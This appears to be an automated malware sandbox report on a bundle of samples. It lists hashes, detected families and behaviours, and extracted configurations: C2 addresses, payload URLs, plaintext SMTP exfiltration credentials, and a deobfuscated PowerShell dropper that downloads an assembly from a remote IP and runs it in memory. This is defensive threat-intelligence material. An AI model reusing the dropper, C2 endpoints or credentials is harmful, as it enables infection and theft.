Resubmissions

21-12-2024 22:57

241221-2xpr2atjar 10

21-12-2024 20:29

241221-y9xfvsyngy 10

General

  • Target

    JaffaCakes118_3a2e31f2844df5cb91eedbf24c0b93de4b0aa08525f733132c2bce0d7ab81acc

  • Size

    973.8MB

  • Sample

    241221-2xpr2atjar

  • MD5

    0523322523fc2607b21cf06ee2c06e2f

  • SHA1

    49924c11f7b22dbb1fec51402214a4b62f0c4da0

  • SHA256

    3a2e31f2844df5cb91eedbf24c0b93de4b0aa08525f733132c2bce0d7ab81acc

  • SHA512

    a6ca6c07ece8ad4f4c832cf40bf35e267bfc56f34d0aa252b2cfdcc75ee7fd2b9aa55b547b849820163ca48bd05c9061c76d80756427950d2e5181ebace1ebae

  • SSDEEP

    25165824:cbjDAJklOVFPCJ4jMrhQVzccWZYSXn4yPPGwnSQuw:cbj8Sl66PhncWZYyWw6w

Malware Config

Extracted

Family

gafgyt

C2

185.28.39.15:839

Extracted

Family

irata

C2

https://iuskmmdm.ml

Extracted

Family

mirai

Botnet

MIRAI

Extracted

Family

purecrypter

C2

http://41.216.183.235/Ogrogk.jpeg

https://cdn.discordapp.com/attachments/1033689147958902804/1033916196451516516/Njnwwomqhh.bmp

https://cdn.discordapp.com/attachments/1033689147958902804/1033908505989628004/Dfygmnwx.png

http://45.139.105.228/Pinkptlahbx.bmp

https://onedrive.live.com/download?cid=A091E1A18B960958&resid=A091E1A18B960958%21160&authkey=AP6mjbZ6I7me0us

http://185.216.71.120/Dsysssji.bmp

https://onedrive.live.com/download?cid=A091E1A18B960958&resid=A091E1A18B960958%21159&authkey=AFru6OsgFq10mzo

https://onedrive.live.com/download?cid=BD9480D014FE52E5&resid=BD9480D014FE52E5%21322&authkey=AHyzW5kyN2MBgPo

https://fullline.com.my/loader/uploads/Cofucfwmi.bmp

https://onedrive.live.com/download?cid=96F930A16702BA42&resid=96F930A16702BA42%21110&authkey=AMJ1Am8lmlZPVrM

http://185.216.71.120/Ypvoi.png

https://transfer.sh/get/afXUmU/Uyofoxfltd.jpeg

http://185.216.71.120/Eztxeazszv.png

https://onedrive.live.com/download?cid=A091E1A18B960958&resid=A091E1A18B960958%21165&authkey=AKz2N-2upLtVH0U

http://www.ugr.leszczynskie.net/mapa/Upfhbfhbavc.png

http://185.216.71.120/Yqnvktamyg.png

http://194.180.48.203/Uhprtckm.bmp

http://45.139.105.228/Ittogj.bmp

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

andrmonitor

C2

https://anmon.ru/download_checker.html

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

aurora

C2

176.124.220.67:8081

Extracted

Family

rhadamanthys

C2

http://104.161.119.221:8899/live-edge/nft.png

Extracted

Family

socelars

C2

https://hdbywe.s3.us-west-2.amazonaws.com/sadew1013/

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

systembc

C2

95.179.146.128:443

146.70.53.169:443

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

njrat

Version

0.7d

Botnet

Brouteurs

C2

forthewin.ddns.net:13337

Mutex

fc4dbf906d35a96ddea0300f5b82bfb3

Attributes
  • reg_key

    fc4dbf906d35a96ddea0300f5b82bfb3

  • splitter

    Y262SUCZ4UJJ

Extracted

Family

asyncrat

Version

XSSYE 1.0.8

Botnet

Default

C2

open.imgov.cn:8443

Mutex

91e5d29b47a7d36802e6e1151434cd02

Attributes
  • delay

    30

  • install

    false

  • install_file

    1111game.exe

  • install_folder

    %AppData%

aes.plain
1
bpCqrBXnuuR2vdg7bNQs0mSaGCqSi6CL

Extracted

Family

raccoon

Botnet

d1d6daf7a5018968dea23d67c142f047

C2

http://5.255.103.158/

Attributes
  • user_agent

    x

xor.plain
1
d1d6daf7a5018968dea23d67c142f047

Extracted

Family

laplas

C2

clipper.guru

Attributes
  • api_key

    f9ff07c5a5e00d26196b3460b72ad41c90dbd24c7405de597560a9a72e3582dd

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    mail.keefort.com.ec
  • Port:
    587
  • Username:
    mojosnk@keefort.com.ec
  • Password:
    icui4cu2@@
  • Email To:
    mojosnkreprt@keefort.com.ec

Extracted

Family

erbium

C2

http://77.73.133.53/cloud/index.php

Extracted

Family

netwire

C2

podzeye2.duckdns.org:4433

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password

  • registry_autorun

    false

  • use_mutex

    false

Extracted

Family

smokeloader

Botnet

pub4

Extracted

Family

gcleaner

C2

45.139.105.171

85.31.46.167

107.182.129.235

171.22.30.106

Attributes
  • url_path

    ....!..../software.php

    ....!..../software.php

Extracted

Family

redline

C2

62.204.41.141:24758

Attributes
  • auth_value

    76a7aa24209b18e5866f6b31583d7851

Extracted

Family

redline

Botnet

Dozkey

C2

91.212.166.17:47242

Attributes
  • auth_value

    c06f8f31502cdaf6d673db7589189fd5

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Extracted

Family

formbook

Version

4.1

Campaign

a20e

Decoy

pushkarinidigital.com

e-shiryoku.com

sendmeblog.website

arniepalmer.com

tinnnitin.click

serummoctoc.online

chmoptk.xyz

kidskarpentry.com

wanglin123.com

onlinecannabis24dispensary.com

hkwx8.com

marcrosenkrans.com

bridginglegal.com

a2r2.cyou

app365e.com

semesta.xyz

encuentratucasacr.com

huiyusc58.com

carnivalofmiami.com

functionalbreeze.com

Extracted

Family

vidar

Version

55.1

Botnet

1636

C2

https://t.me/dghzq

https://t.me/zjsqpz

https://t.me/fqwexzq

Attributes
  • profile_id

    1636

Extracted

Language
ps1
Deobfuscated
1
[byte[]]$rowg = [system.convert]::frombase64string((new-object net.webclient).downloadstring("http://20.7.14.99/dll/dll_ink.pdf"))
2
(((([system.appdomain]::currentdomain).load($rowg)).gettype("Fiber.Home")).getmethod("VAI")).invoke($null, [object[]]"txt.om/ort/gmi/moc.nesnez-igoto//:sptth")
3
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    shaqone.shop
  • Port:
    587
  • Username:
    sender@shaqone.shop
  • Password:
    qPV%6P+jrcf3hV8WFP
  • Email To:
    support@shaqone.shop

Extracted

Language
xlm4.0
Source
1
=CALL("C:\Users\Admin\AppData\Local\Temp\17286809694b9d22325e29af4e74b2083398de0488d9a96644566c468628554d.xll", "xlAutoOpen", "")

Extracted

Family

lokibot

C2

http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

formbook

Campaign

fofg

Decoy

FHyydxpFBs0S8b4ZlP7ZEtd/

EVaCEKb/cVV9xQ==

U9I5lke0IuU7vj5EXus=

rXD3AKPV3qUblOUsV41KMfU=

PwBSy5z56XNzIvnS3ygsKv0=

CQe1BLbSnGXX

HuhKjxhLhxqBy2FFz8WoFA==

QJymezEoLOFZ1T5EXus=

V8r5PAdwuGK2AUARohas

b1XV06ANH9s5uj5EXus=

3EiEhwo7Euw2tl8=

c2PjK8Izkydy5N8x

CXCkYf0m/qPrv8QajKyT6Oo=

pHjy+Mk0CqvWBXdCz8WoFA==

QjSwr3/j5rAyvz5EXus=

+edxANg/sU+k8YFQz8WoFA==

tWiQq3rqyl6cTAG9pA==

GeAyMQxBUOlDwD5EXus=

nQ5eoT2mEKkhDN2DwBek

JP5dIbHlrXXR8umDwBek

Targets

    • Target

      09fe7735f742e003ace00c9884b1eb6d55c719735a1fcd207ac985ce746b008a.exe

    • Size

      1.0MB

    • MD5

      690a381d9e34389a101cc26042eb01d9

    • SHA1

      20cbdf652baa00adc83670d907b14724445da0f2

    • SHA256

      09fe7735f742e003ace00c9884b1eb6d55c719735a1fcd207ac985ce746b008a

    • SHA512

      4d101dbd26245e9365bc8a92a4feaa122811468643b8dc9ec6bdc2dc0e53469e37bbba0912ba45071c105f01af44e3959985a56309476fdbec8c1933d9c12b52

    • SSDEEP

      24576:7kr1gzNc71ZGytgGTpd0FUDJr3HbZMOBr:Qr+aRn0FUd73

    • NetWire RAT payload

    • Netwire

      Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    • Netwire family

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Suspicious use of SetThreadContext

    • Target

      0a08857b3b6b52510c544f54f8b7489038e371a85db858ad3c34c4f7198da819.vbs

    • Size

      195KB

    • MD5

      a4f71409b11c7a677353f1d7b3e0d13a

    • SHA1

      704ec3fdb8f2ee5e39957785f0d03d5268abd5e6

    • SHA256

      0a08857b3b6b52510c544f54f8b7489038e371a85db858ad3c34c4f7198da819

    • SHA512

      0ed1f3d2fff28a0b7977f966b35c65ed3c3c385eecacf5b1feb38c20ecbbb3017b77b4eca584ea342be86e8e3e5baeec2dbdda3de5c85e97658cd9a4892c1a52

    • SSDEEP

      768:r1wsIXCNd5dghna/lS9P0P7SFuumB/bm/:4wCGBC/

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Target

      0a92b6b6c9ccba573ca47718bf608715dbc87ad48afc19bf7004d8eb9bf598d0.exe

    • Size

      930KB

    • MD5

      53f4e52a78bdf6541e3efdaf401ebbd3

    • SHA1

      9c4841f6dc393e0a197aba01e9cb8491999a6150

    • SHA256

      0a92b6b6c9ccba573ca47718bf608715dbc87ad48afc19bf7004d8eb9bf598d0

    • SHA512

      f14c3b7c53df876eae2d1ea6e03d88d419e91ee9926334993d585f470c4a13eaa1326544de95a0ce06d3b2590461b3ef52c988c8d1bde7e56ca6b49081305300

    • SSDEEP

      12288:GMY3QedajfctobEgT4FtM/e2Rw4nZu4LvJ0BPykKu2sN9nuI:GMwdwOobfT4Foe2pLBuhN9n

    • Target

      0b1f6297e8bfa8fc9ff8a7ad85487ff456c0d66ef2d908588cd27345fba5f4e6.exe

    • Size

      1.2MB

    • MD5

      76f35ccb9dc8b2342d34237d041d16de

    • SHA1

      25b50efad77cebcabf2969a97f31db993286d066

    • SHA256

      0b1f6297e8bfa8fc9ff8a7ad85487ff456c0d66ef2d908588cd27345fba5f4e6

    • SHA512

      06c98ccc3cab2175207f9f2ecc410fafc450f318ff53fc70607b346584f0cefc3377d2eadb347a1814629eb2966cc0c818e9be4fe8a3fb84664178159993fc9c

    • SSDEEP

      12288:Z6xsbHodJWWMvNlg+ijLraGFdhJhVTqzEfaH/jVCLzcmI+Sec3IpCT:Z6xsbfWsXylvaEfa7wEb6MT

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    • RedLine payload

    • Redline family

    • Suspicious use of SetThreadContext

    • Target

      0b4ffb13a42cb2432b4e021c18f4b4dd51b669ba0356804ca32dac2de7741caa.exe

    • Size

      2.4MB

    • MD5

      1362efe98b360c63f8901fad9b6542fe

    • SHA1

      7cee9adac7453dcf74e77a6907951916e590e593

    • SHA256

      0b4ffb13a42cb2432b4e021c18f4b4dd51b669ba0356804ca32dac2de7741caa

    • SHA512

      29882782ddd3ccf7f6e26135832da86ea961faefd67ddbce79945ef81f291d49051cd5fddb1cb13e11bf996697be5c542427f6aa8876c417f7ba460b50b3f7e1

    • SSDEEP

      49152:Z2Yz1Y1xuKe6eF5NPw13Q4/Dof7G41kBNqrcygeCDqQ/XJ5txoJbljwjcWKVA5hq:MwWEvzo13Q2D6GmMScecqQcJbWIKDq

    • GCleaner

      GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    • Gcleaner family

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Target

      0b9a6ed57e23d874bde98d89d3c50a44b3982570cb8bbf41660fad19d3fbe855.exe

    • Size

      5.4MB

    • MD5

      3a6af02d19a5f472a0357ccb50e5b0a6

    • SHA1

      245b235c383d80ca2ae88681bf12f27bea96b92e

    • SHA256

      0b9a6ed57e23d874bde98d89d3c50a44b3982570cb8bbf41660fad19d3fbe855

    • SHA512

      ac7dde150babc8348b963345ce330ee081978e80c1c80344a240c14cb277ba219a0189b6fbd9353a42869281e00b176021a491fdded3b456f4e9bd8638f5a8e4

    • SSDEEP

      98304:xZc4ddDQkADTo0arkXDiBH9ftXnFmEuM2B4lXzqN346KNadVRvhfPqH:Dbv6UGDohFO/sY1rRJ

    • VMProtect packed file

      Detects executables packed with VMProtect commercial packer.

    • Adds Run key to start application

    • Target

      0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe

    • Size

      349KB

    • MD5

      02a41eb01d841ddffe402fcfbb73bd0e

    • SHA1

      932bdc88df3e0c3d0747ec3a53b9aaaf7365b88b

    • SHA256

      0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca

    • SHA512

      c6f42a2f012e320ffdb435e129bf2ab2b62bcea7af20ac10d60ccb11239ef02324845f4a74d2868a70db2715fe6dc9ff7e7c4a789e1bbdaaf3bbef07166e1773

    • SSDEEP

      6144:FweEwTKu1gRtv6cWGqV/9zYTyOpMKbsAJRv31M0E2Jt:Mv6cxqV/GGOqKoAPv31M0/

    Score
    7/10
    • Executes dropped EXE

    • Target

      0c046f07cd96f008a224dc272c32b52af4611cd1852d38db9737abbe3fcf9e89.exe

    • Size

      229KB

    • MD5

      f8c0a565c50b57b8ebc9c280007312ec

    • SHA1

      e0a90e6d88b92002c7b77dc8298cd1b98f89d99e

    • SHA256

      0c046f07cd96f008a224dc272c32b52af4611cd1852d38db9737abbe3fcf9e89

    • SHA512

      483f609a16c268bfb7626bd6dc7826d8822671342cad1ebdab64115863efe7a75dd13ce6ed31b3c89f691644b2a5d719d43f47994769db2c5753e34bdaedf185

    • SSDEEP

      6144:wf6fRxdLyrc/quEJfylTp45uuo9qcOY7Mnh:wf6fRbGcSuEJfylTp4YuUf

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Tofsee family

    • Creates new service(s)

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Executes dropped EXE

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe

    • Size

      371KB

    • MD5

      341944954703c303537b9d8aa25e5531

    • SHA1

      836351bd41f31d10209d0bdab117186d86071816

    • SHA256

      0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553

    • SHA512

      9fc832dbd848b6fba32e5beca85e7e55e385f677739ce4372d3cd76a3b05d044e1cb4edbae3fda7eadd185803359642fef50ea8691ae488d8d7dce19eca99073

    • SSDEEP

      6144:Ic/RLyHWHs8c5LRMuPpucS5YUhb7jRXBsL36vAiVMaY/6V:Ic/R2HsIMuo5YUNNX4U1VM

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    • RedLine payload

    • Redline family

    • Target

      0d825ad1df7c2ac718991f061800e31c6ae4ac7a35516676ac0dad40b84b6037.exe

    • Size

      229KB

    • MD5

      5ee27318991c7dcdfea2fb99ae8f219b

    • SHA1

      1490d4de2bbdb3379819aa08cfd0f0c7762b3783

    • SHA256

      0d825ad1df7c2ac718991f061800e31c6ae4ac7a35516676ac0dad40b84b6037

    • SHA512

      88cfef8883ed42b841563632ffd7eae1eebfb2d3e1bedda3a6794b37d559bcbaa48de979e7a77011325ea96bd36742673b8f1704bad840a938e4ba829018abb7

    • SSDEEP

      3072:DNPnQxjSky4aM1woJLJVqdj98m6hce5VYytX7RMzshG3ZcOGgSerQiswun:DNPQxGNuLJVYj9hgikXlU3TDSKxu

    • Target

      0db3c21dec09a297e99a07ec1ebd007146adfbcb3c8f0d4a3f88868778c6aef9.exe

    • Size

      317KB

    • MD5

      fe62aba35fd5f1c6ca2c1c8be6c27ed3

    • SHA1

      b1912c42ae6742ee1f85be843ad3f66a45372464

    • SHA256

      0db3c21dec09a297e99a07ec1ebd007146adfbcb3c8f0d4a3f88868778c6aef9

    • SHA512

      2d4fedf8c40f2796539a046277ea7f8b6a514e2cecd0b630e8a3a137254a627c873684d247f9e01b53cda4cd36dfa504e9ef1e3c1ed521f9343d45d41032b92a

    • SSDEEP

      6144:fhu1FLTeIjxfniZ5nr6qBgplf95QfGuYjuK2uPbcRItN:fhuXOAfnErgplf3huNuPb0I

    • GCleaner

      GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    • Gcleaner family

    • Target

      0de875f11ee5d69c5b4633e3b878529f08788440f87fb3ab0cde77e698b200e9.exe

    • Size

      350KB

    • MD5

      36fcbb3b37a9ba63f1fa77c22297c6a9

    • SHA1

      96f7e90a7949064e286c5cf6a39e40aea2f21263

    • SHA256

      0de875f11ee5d69c5b4633e3b878529f08788440f87fb3ab0cde77e698b200e9

    • SHA512

      ce25057372e00b915f92fae2b4398af9badcec1b8f4a0a5b532f12050adb1bf2ae0657849a8f54e066fcd14cac00e3a691da5393c6c3aae23083358d3d701c11

    • SSDEEP

      6144:ocLt8AYW3GpW4DW7Q74jOxdiUhtoMgJ51XPKM7MBr:ocR8TP87QIWAUhtoXJnXPKo

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    • RedLine payload

    • Redline family

    • Target

      0e3bb95b7ba92dadc59985e6b0d1a75db091d6ca03f755fca34437398217f877.exe

    • Size

      2.4MB

    • MD5

      7e5e288607447a41931025d1f79760ae

    • SHA1

      4ad9a21318ce3c9150b16d1c7d4acef655eb86bf

    • SHA256

      0e3bb95b7ba92dadc59985e6b0d1a75db091d6ca03f755fca34437398217f877

    • SHA512

      7738b15725bab95d16f949f0dc8cc2e9b9c61936d8b3a54a932fb6dd3f0ab38bc21c8f484395eaaa2686d397e22032f6b681c3920721faa04f5663d20c3da083

    • SSDEEP

      49152:Z20nrOjMNC7wlZ6+3WddBI6crIdYnX5oCmG1YQV0REpLgfNcA5hq:MAOjM4wlQCWfBINsADvV0R2gf1Dq

    • GCleaner

      GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    • Gcleaner family

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Target

      0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d.exe

    • Size

      252KB

    • MD5

      130f4b6ad5c42bdb5abb4e45406cef94

    • SHA1

      efc55e5f2520c089bfedcc3cfcb4630f595fb688

    • SHA256

      0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d

    • SHA512

      88fdbe7ef0b3a076ebc872d5dc00fb2fa9ff827420433fc24d886d27fc5b462ba090301be042a9a3c5b31241f82b361afe8d586dd48bd5df393f39d0305d4192

    • SSDEEP

      6144:XCutDb6sMMMMMMMMMMMuMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMg:yObMMMMMMMMMMMuMMMMMMMMMMMMMMMMh

    Score
    3/10
    • Target

      0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe

    • Size

      219KB

    • MD5

      566a30af3032ed8c2718c99a9c0d7289

    • SHA1

      4d08ff905ddfdaf7f39465b9af09b6441e8993d7

    • SHA256

      0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6

    • SHA512

      03aa457d3d68d96cdcb8a2d234fac21466bac359bc10948ac1b79222361e992d456df8ba89c8c4e0ada87da0502857a3586ed232a114db9823f13d60308526b1

    • SSDEEP

      3072:UXWlLKlKMO5qI0Ac7ztrQNZezyzh91Ih3Az9Mo+ATIulLwt:QQLrM937JUNZeeFTEMuoZTIuh

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Tofsee family

    • Creates new service(s)

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Executes dropped EXE

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      10758789ca875d9783a8988e0b0dbfd88f75a6ac0eb544b5b37241492223fdd1.exe

    • Size

      647KB

    • MD5

      92e6f05295ae825d4f3d9982a616b98e

    • SHA1

      eb73f950397f919df73442f66cbd15deee931cea

    • SHA256

      10758789ca875d9783a8988e0b0dbfd88f75a6ac0eb544b5b37241492223fdd1

    • SHA512

      100e49ead6c63aba1470ebad85d969310741cc6d7c8d974551ffa07aa1923dec4f4153d363387328c493198ad98bf7535f2f4e138203daa3849ca28f265a3243

    • SSDEEP

      12288:rYK4r6syCKHtudgQcEfCUkNNvshJGxnLeFnQ:rYK4RNKCcg1knvsh45LeFnQ

    • Formbook

      Formbook is a data stealing malware which is capable of stealing data.

    • Formbook family

    • Formbook payload

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Suspicious use of SetThreadContext

    • Target

      11a3fde6fbce94c261cc8785856d132eccd5239e95a9129c2ba404cad58bbd96.exe

    • Size

      307KB

    • MD5

      848cfa950baa476b7127aa42a8f8cb2f

    • SHA1

      60fd5296042413a9cebb3a4952f8efa36d8d31d1

    • SHA256

      11a3fde6fbce94c261cc8785856d132eccd5239e95a9129c2ba404cad58bbd96

    • SHA512

      6bed8b5a08a9bfd6eb88eb4203960e6f71e348ae254877653ece37ad144d0e94d79bee58a3e1a39e0c33d0170e2e4aa1ee269224325799cbe5d8fe0b7e1a4e58

    • SSDEEP

      3072:sXqhLZd18O5PcsUpbfxaBytteEd8mGkhXhSSOxtzIZ9dKfV0DgR84+5sm+t904:ooLZ84csYaBk/hXgSOxtodKuDgRTX

    • Target

      11bb525d06957723f55934f7697eaf4c6e0437e435d3fea9f1f4a16d71cd041c.exe

    • Size

      222KB

    • MD5

      80c18619e17ff0835fd578aed8422e4b

    • SHA1

      d82dd7c61eede169f542f89b2fce22841345c1a1

    • SHA256

      11bb525d06957723f55934f7697eaf4c6e0437e435d3fea9f1f4a16d71cd041c

    • SHA512

      25b0946140fe0de5eda34f67089a6bb39827fdd421853edaca55cfa5cbcd199430c0c85dda90b0e225793c1a70708eb7ec8175fed6176f174becdf522ed22584

    • SSDEEP

      3072:BSnlmJpEgXKnlL0EAhoTwN6+k5P5Ykc7Dh2N/qyGqPBBu5YGLTuUO/BcCp:BSYULyNczcp2F1HsYG/VO/BcC

    • Target

      124dcea053b32060dc96c5b2901df4264837a87ea25e635e0ac76145450d9a69.exe

    • Size

      732KB

    • MD5

      c5e02c378a0ddbc62c4172830947e97d

    • SHA1

      d0ed805d5b40454a091f233d0c1d9b29ec64c515

    • SHA256

      124dcea053b32060dc96c5b2901df4264837a87ea25e635e0ac76145450d9a69

    • SHA512

      97a79a56be88085ab2402e4a7474afa344e1eab45108429f2e80de7860da04a97f04220496602d737b9523c854b9c1c24895329d85eb962101b90c19cced5d79

    • SSDEEP

      12288:oy10PPJaxEOCf5lpLR6AlAaXjxmQpunxdk9dmhbbE8QUuQZ60sSj:kTxpcxdPtbE8Duu60sSj

    • Snake Keylogger

      Keylogger and Infostealer first seen in November 2020.

    • Snake Keylogger payload

    • Snakekeylogger family

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      13431e2ee5bc86bdc9b53f47dd2ea61912a00952a3ea8f97ea3842ad7053551c.elf

    • Size

      96KB

    • MD5

      9a44a623c0b3bf86f337244a492bb849

    • SHA1

      14e27701d655f430048e92a429926a5fd8abf362

    • SHA256

      13431e2ee5bc86bdc9b53f47dd2ea61912a00952a3ea8f97ea3842ad7053551c

    • SHA512

      5b2337ffe4a6089621586544bba4fd1809e9b113b05566be1326a7b733571332ecc5241ef9bcaf81cab91a34dfd73318df2987781cfb4c3d78311a21a0bbc321

    • SSDEEP

      1536:7QQfckMzQzgv9OtAC0QptczD3z+FavgfTXvEmL49VqFjtUfkjX:7xH/JFDtczD3m57vEmU9VqFBUfkjX

    Score
    3/10
    • Target

      15387da23f7465d5c4ccd137bc21d15d74c0006c7536b92afed5337cdb3e0315.js

    • Size

      100KB

    • MD5

      ed9d1e4c580a9f92815d0cbf00b47b20

    • SHA1

      ccc8533cc8fd804988c75f9ff827192bb98dab3b

    • SHA256

      15387da23f7465d5c4ccd137bc21d15d74c0006c7536b92afed5337cdb3e0315

    • SHA512

      ae543bb540190d4e799cce94f943526ca60d1b8376413dc8fb66251f567087ffaa8ebaf4e67761c51b098c538e0da937e8b65859f968bc58908b9899fd0b24b4

    • SSDEEP

      3072:9F7D4Y+Jk9olJaXvY96bal9BtNe66WWtUrcZtXGD23VMJFB:9FniHKYIOB

    Score
    8/10
    • Blocklisted process makes network request

    • Target

      15938b5637e639c182992c8fdf65b8db3d461c85f6eac57044f40d2a68955372.exe

    • Size

      229KB

    • MD5

      83fd029a3fbe2efc79f203479a4c21e6

    • SHA1

      4290032c569c5eb64d7ebd4c50ef36f01f08dc27

    • SHA256

      15938b5637e639c182992c8fdf65b8db3d461c85f6eac57044f40d2a68955372

    • SHA512

      feb38390727625b364246e17217501b090d4bec00e131043887a5e7e74e9a4caa9b300fa67ed393504aacb62dd7284a471bd747ca6b2b1057b919e6d284d7c17

    • SSDEEP

      3072:GS6n5Yu86fFYNLLS8sZDRw6Cv5NOCr9YBVBNZ/IxwTGHFMtFiRiU4A:GS6uaYRLS82DKL3OCrEVzZ/IAGlmFtU

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Tofsee family

    • Creates new service(s)

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Executes dropped EXE

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      170dc238d7e8c6f55a0aedddd2d01deb03d62e71d7da5c51f67632d2de3f93a4.exe

    • Size

      1.2MB

    • MD5

      749fd58dcffee43317d573fbec8eaddf

    • SHA1

      08964a5cbccfe8460fdbd126004ffdd6c81a1121

    • SHA256

      170dc238d7e8c6f55a0aedddd2d01deb03d62e71d7da5c51f67632d2de3f93a4

    • SHA512

      357eb5dcdaa4aa2249d8a1937cae7c8d362466d63fcbe8232cdf8c561623ee7470ae9f4601090dffb3b41545a032d63fcaba504a0c3c1bbaba579c1333b3f09f

    • SSDEEP

      24576:XAOcZ9OUVm7BVha9TlEkqIMMvBwA2MNxjFJ7oHeWXL7WY:pC0klEkTMMvZx9+7WY

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

    • Agenttesla family

    • Executes dropped EXE

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

    • Accesses Microsoft Outlook profiles

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      17286809694b9d22325e29af4e74b2083398de0488d9a96644566c468628554d.xll

    • Size

      551KB

    • MD5

      8c3611f6e56cb6edf445374ba7b8d6b9

    • SHA1

      15b32a9f730e1828193ed0f0bc09aa150d66916a

    • SHA256

      17286809694b9d22325e29af4e74b2083398de0488d9a96644566c468628554d

    • SHA512

      71954f7e5fb770ea06f97d78fb0510cf2f638f6afc5c0555c62c1b411ccded1a487903a284c0e7921beba0de019995877d7f7f518f39559f72e445e2cb53c89c

    • SSDEEP

      12288:Yn/zjvGHAykHJRLW/4+8bzbBSreM3pqZGDxK:az7GHAzH7jX1GFx

    Score
    10/10
    • Loads dropped DLL

    • Target

      17dadc2b105c925bb5d598789e418a9fdedac3a5a26a05fa4b77c8d82f685bb1.elf

    • Size

      26KB

    • MD5

      1c9847187417b3862a8bb18705951f8d

    • SHA1

      eed2e1e9134b783f8e2cc5b25de151fdcf1d3d7f

    • SHA256

      17dadc2b105c925bb5d598789e418a9fdedac3a5a26a05fa4b77c8d82f685bb1

    • SHA512

      59374fcc66d8d805a13b9b076001600df03049ea87c7f6c0468779352f4475c151048a1797b0842058a0543c52f5dbef57c0da3f6a3fcdf558f8bdfd614f0f81

    • SSDEEP

      768:eMKyhegCCMqf2ExRIIOyF+Hx42gU99k9q3UELuZ:NKy4qf2XmFYaqNLE

    Score
    3/10
    • Target

